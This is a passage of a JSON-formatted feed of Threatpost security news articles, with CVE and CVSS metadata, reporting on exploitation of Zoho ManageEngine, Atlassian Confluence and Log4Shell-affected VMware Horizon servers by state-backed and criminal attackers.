Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-16T21:09:23", "type": "threatpost", "title": "CISA, FBI: State-Backed APTs Are Exploiting Critical Zoho Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T21:09:23", "id": "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "href": "https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised.\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can refrain from inflicting targeted systems with code that\u2019s likely to be flagged as malicious until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,'\u201d United 42 researchers Robert Falcone, Jeff White and Peter Renals explained. \u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of Threat Group 3390, aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. \u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threapost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were subsequently breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and MangeEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-07T16:21:15", "description": "A just-patched, critical remote code-execution (RCE) vulnerability in the Atlassian Confluence server platform is suffering wide-scale exploitation, the Feds have warned \u2013 as evidenced by an attack on the popular Jenkins open-source automation engine.\n\nAtlassian Confluence is a collaboration platform where business teams can organize its work in one place: \u201cDynamic pages give your team a place to create, capture, and collaborate on any project or idea,\u201d according to [the website](<https://www.atlassian.com/software/confluence/guides/get-started/confluence-overview>). \u201cSpaces help your team structure, organize and share work, so every team member has visibility into institutional knowledge and access to the information they need to do their best work.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn other words, it can house a treasure trove of sensitive business information as well as supply-chain information that could be used for follow-on attacks on partners, suppliers and customers.\n\n## **Jenkins Hack \u2013 Just a Cryptomining Hit**\n\nFor its part, Jenkins identified a \u201csuccessful attack against our deprecated Confluence service,\u201d it said in [a statement](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) over the weekend. Thankfully, \u201cwe have no reason to believe that any Jenkins releases, plugins or source code have been affected,\u201d the team added.\n\nThe attackers were able to exploit the bug in question ([CVE-2021-26084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084>)) to install a Monero cryptominer in the container running the service, according to the statement \u2013 no cyberespionage in this case. The team took the server offline immediately and rotated all passwords, and there\u2019s no plan to bring Confluence back, it said.\n\n\u201cAn attacker would not be able to access much of our other infrastructure,\u201d the statement continued, adding that the server hasn\u2019t been used in daily operations since late 2019. \u201cConfluence did integrate with our integrated identity system which also powers Jira, Artifactory, and numerous other services.\u201d\n\nThe hack comes on the heels of an urgent pre-Labor Day warning from U.S. Cybercommand that the flaw is firmly in the sites of cybercriminals aiming at U.S. businesses, less than 10 days after it was disclosed on August 25:\n\n> Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate. Please patch immediately if you haven\u2019t already\u2014 this cannot wait until after the weekend.\n> \n> \u2014 USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) [September 3, 2021](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283?ref_src=twsrc%5Etfw>)\n\nIt\u2019s a finding that echoes researchers from Bad Packets, who said [via Twitter](<https://twitter.com/bad_packets/status/1433157632370511873>) that it began to see mass scanning and exploitation for CVE-2021-26084 around Sept. 1.\n\nOn Tuesday, Japan-CERT [issued guidance](<https://www.jpcert.or.jp/english/at/2021/at210037.html>) that active exploits were being deployed in Japan as well.\n\n## **RCE with CVE-2021-26084**\n\nThe bug is an Object-Graph Navigation Language (OGNL) injection vulnerability that affects Confluence Server and Data Center (affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5). OGNL it is an expression language for getting and setting properties of Java objects, which can be used to create or change executable code.\n\nIn some cases, an unauthenticated attacker could execute arbitrary code on a computer running a Confluence Server or Data Center instance \u2013 which earned the issue a critical 9.8 out of 10 rating on the CVSS vulnerability-rating scale.\n\n\u201cIf the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems,\u201d [explained](<https://unit42.paloaltonetworks.com/cve-2021-26084/>) researchers at Palo Alto Networks, who also confirmed the exploitation activity.\n\nKaspersky researchers explained that the vulnerability is only usable for unauthenticated RCE if the option _\u201c_Allow people to sign up to create their account_\u201d _is active.\n\n\u201cSeveral proof-of-concepts for exploiting it, including a version that permits RCE, are already available online,\u201d Kaspersky noted [in its writeup](<https://www.kaspersky.com/blog/confluence-server-cve-2021-26084/41635/>), issued Monday.\n\nAtlassian [has released updates](<https://www.atlassian.com/software/confluence/download-archives>) for versions 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. The bug doesn\u2019t affect Confluence Cloud users.\n\n## **Atlassian\u2019s Summer of Security Woes **\n\nIn July, Atlassian patched a serious flaw in its Jira platform, which is a proprietary bug-tracking and agile project-management tool used for software development. It\u2019s often tied to ([PDF](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf>)) the Confluence platform through single sign-on (SSO) capabilities.\n\nThe issue tracked as CVE-2020-36239 could enable remote, unauthenticated attackers to execute arbitrary code in some Jira Data Center products, thanks to a missing authentication check in Jira\u2019s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching.\n\n\u201cCVE-2020-36239 can be remotely exploited to achieve arbitrary code execution and will likely be of great interest to both cybercriminals and nation-state-associated actors,\u201d Chris Morgan, senior cyber-threat intelligence analyst at digital-risk provider Digital Shadows, [said at the time](<https://threatpost.com/atlassian-critical-jira-flaw/168053/>). He pointed to several recent supply-chain attacks, including attacks against software providers Accellion and Kaseya, that have leveraged vulnerabilities to gain initial access and to compromise software builds \u201cknown to be used by a diverse client base.\u201d\n\nEarlier, in June, researchers uncovered a chain of Atlassian bugs that [could be tied together](<https://threatpost.com/atlassian-bugs-could-have-led-to-1-click-takeover/167203/>) for one-click information disclosure from Jira accounts. Sensitive information could have been easily siphoned out of the platform, researchers at Check Point Research said: \u201cAnything related to managing a team or writing\u2026code that you can encounter bugs in.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-07T16:07:58", "type": "threatpost", "title": "Jenkins Hit as Atlassian Confluence Cyberattacks Widen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-36239", "CVE-2021-26084"], "modified": "2021-09-07T16:07:58", "id": "THREATPOST:042D7C606FEB056B462B0BFB61E59917", "href": "https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-29T20:34:59", "description": "What researchers are calling a \u201chorde\u201d of miner bots and backdoors are using the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) bug to take over vulnerable VMware Horizon servers, with threat actors still actively waging some attacks.\n\nOn Tuesday, Sophos [reported](<https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/>) that the remote code execution (RCE) Log4j vulnerability in the ubiquitous Java logging library is under active attack, \u201cparticularly among cryptocurrency mining bots.\u201d Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes are [initial access brokers](<https://threatpost.com/zebra2104-initial-access-broker-malware-apts/176075/>) (IABs) that could lay the groundwork for later ransomware infections.\n\n## History of Log4Shell Nightmare-ware\n\nThe Log4j flaw was discovered in December, vigorously attacked within hours of its discovery and subsequently dubbed Log4Shell. Sophos\u2019s findings about VMware Horizon servers being besieged by threat actors leveraging the bug is in keeping with what\u2019s been happening since then: In fact, cyberattacks [increased](<https://threatpost.com/cyber-spike-attacks-high-log4j/177481/>) 50 percent YoY in 2021, peaking in December, due to a frenzy of Log4j exploits.\n\nWith [millions](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) of Log4j-targeted attacks clocking in per hour since the flaw\u2019s [discovery](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>), within just a few weeks, there was a record-breaking peak of 925 cyberattacks per week per organization, globally, as Check Point Research (CPR) [reported](<https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/>) in early January.\n\nLog4Shell has been a nightmare for organizations to hunt down and remediate, given that the flaw affected hundreds of software products, \u201cmaking it difficult for some organizations to assess their exposure,\u201d noted Sophos researchers Gabor Szappanos and Sean Gallagher in Tuesday\u2019s report. In other words, some outfits don\u2019t necessarily know if they\u2019re vulnerable.\n\n## Why Attackers Have Zeroed in on Horizon\n\nIn particular, those attacks have included ones targeting vulnerable [VMware Horizon](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) servers: a platform that serves up virtual desktops and apps across the hybrid cloud. These servers have been important tools in organizations\u2019 arsenals over the past few years, given that the pandemic triggered the necessity to provide work-from-home tools, the researchers pointed out.\n\nAlthough VMware [released](<https://kb.vmware.com/s/article/87073>) patched versions of Horizon earlier this month \u2013 on March 8 \u2013 many organizations may not have been able to deploy the patched version or apply workarounds, if they even know that they\u2019re vulnerable to begin with.\n\n\u201cAttempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,\u201d Sophos said.\n\nEven those organizations that have applied the patches or workarounds may have been already compromised in other ways, given the backdoors and reverse-shell activity Sophos has tracked, the researchers cautioned.\n\nIn late December and January, VMWare\u2019s Horizon servers with Log4Shell vulnerabilities came under [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) attack, as [flagged](<https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike>) by researchers at Huntress. Other [ attacks](<https://twitter.com/GossiTheDog/status/1484145056198053891>) included those that [installed web shells](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nThose attacks used the Lightweight Directory Access Protocol (LDAP) resource call of Log4j to retrieve a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VM Blast Secure Gateway service and thereby granting attackers remote access and code execution. Sophos has seen these attacks show up in customer telemetry since the beginning of January, the researchers said.\n\nThe attacks against Horizon servers grew throughout January. Beyond attempts to deploy cryptocurrency-mining malware, other attacks were potentially designed either to grant threat actors initial access or to infect targets with ransomware, Sophos said. Such attacks have continued into this month: the security firm shared a bar chart, shown below, that shows the ebb and flow of the attacks that have bled into mid-March.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29124520/attack-horizon-e1648572335942.jpg>)\n\nVMware Horizon server attacks since the beginning of January. Source: Sophos.\n\n\u201cThe largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing,\u201d the researchers said.\n\nBut this wave hasn\u2019t relied on the use of one of cybercrooks\u2019 favorite tools, Cobalt Strike: a commercial penetration-testing tool that can be used to deploy beacons on systems in order to simulate attacks and test network defenses.\n\nRather, \u201cthe cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server,\u201d Sophos said, with the most frequently used server in the campaigns being 80.71.158.96.\n\n## The Payloads\n\nSophos found a slew of miners being dumped on targeted Horizon servers, including z0Miner, the JavaX miner and at least two variants \u2013 the Jin and Mimu cryptocurrency miner bots \u2013 of the XMRig commercial cryptominer,. Speaking of which, Uptycs reported in January that cryptojackers had figured out how to [inject XMRig](<https://threatpost.com/cybercriminals-vmware-vsphere-cryptominers/177722/>) into VMware\u2019s vSphere services, undetected. For its part, back in September 2021, Trend Micro [found](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) that z0Miner operators were exploiting the [Atlassian Confluence RCE](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) (CVE-2021-26084) for cryptojacking attacks.\n\nSophos also found several backdoors, including several legitimate testing tools. One such was implants of Sliver: a tool used by red teams and penetration testers to emulate adversarial tactics. Sliver showed up as a precursor to the Jin miner in all the cases where Sophos was able to investigate further, leading the researchers to suspect that it\u2019s actually the payload. Either that, or maybe the actor behind Sliver might be a ransomware gang, the researchers hypothesized, given that the same servers deploying Sliver also hosted files to deliver the Atera agent as a payload.\n\nAtera is another common, legitimate remote 